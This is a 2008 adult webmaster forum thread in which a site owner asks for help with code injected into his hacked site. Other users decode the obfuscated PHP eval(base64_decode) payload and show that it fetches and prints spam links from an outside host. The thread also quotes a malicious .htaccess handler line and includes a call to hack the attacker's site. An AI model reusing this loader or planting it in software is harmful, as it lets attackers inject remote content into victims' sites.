GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!! (https://gfy.com/showthread.php?t=840472)

NetHorse 07-10-2008 07:42 AM
Help someone hacked my site : Please help me decipher code : !!!!!!!!!!!!!!!!!!!!!!!!
 
<!--erda8--><?php eval(base64_decode("JGw9Imh0dHA6Ly9kbWkuZXJkYXVkdG VhbS5iaXovbGluay9saW5rLnBocCI7IGlmIChleHRlbnNpb25f bG9hZGVkKCJjdXJsIikpey ANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gs IENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2 gsIENVUkxPUFRfUkVUVVJO VFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE 9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3Vy bF9jbG9zZSgkY2gpO30NCm Vsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBA JHI7DQo=")); ?>

Someone gained access to one of my sites that promotes a nats program and added that little script. Any idea what that means or what it was possibly doing? Thanks to anyone out there who can help.

DarkJedi 07-10-2008 07:46 AM
It means you need to move to a new host that doesn't have a head up their ass.

NetHorse 07-10-2008 07:53 AM
Also found this is in all my .htaccess files


AddHandler application/x-httpd-php .html .htm .shtm

and huge spam list linking to this site

http://www.evolutionisdead.com/

????????

darksoul 07-10-2008 07:56 AM
Code:
$l="http://dmi.erdaudteam.biz/link/link.php"; if (extension_loaded("curl")){ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} else{$r=implode("",file($l));} print @$r;

beta-tester 07-10-2008 07:56 AM
it means that it'll execute this statement:

$l="http://dmi.erdaudteam.biz/link/link.php"; if (extension_loaded("curl")){
$ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);}
else{$r=implode("",file($l));} print @$r;


if it helps :)

darksoul 07-10-2008 08:02 AM
basically it loads the list with spammed url'es from dmi.erdaudteam.biz/link/link.php

NetHorse 07-10-2008 08:06 AM
Thanks a lot guys I'll try to get a hold of this guy's host and have him shut down

NetHorse 07-10-2008 08:30 AM
estdomains.com is the domain the site is hosted on!

NetHorse 07-10-2008 08:35 AM
If they don't do anything about it can I contact ICANN? I want this asshole's site SHUT DOWN!!!!!!!!!!!!:mad::mad::mad::mad::mad::mad::mad ::mad::mad::mad::mad::mad::mad:

tahiti 07-10-2008 09:17 AM
so easy was some base64 encode.

--->aWYgeW91IG5lZWQgaGVscCBjaGVjayBteSBzaWcuLi4gSSBnd WVzcyB5b3UgY2FuJ3QgcmVhZCB0aGF0IDstKQ==

NetHorse 07-10-2008 09:42 AM
blah someone hack his site. POS really fucked one of my rankings with one site. :321GFY

Juicy D. Links 07-10-2008 09:46 AM
thats some nice code

NetHorse 07-11-2008 12:09 AM
Quote:
Originally Posted by Juicy D. Links (Post 14444821)
thats some nice code
? Meaning these are talented hackers?


All times are GMT -7. The time now is 02:44 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123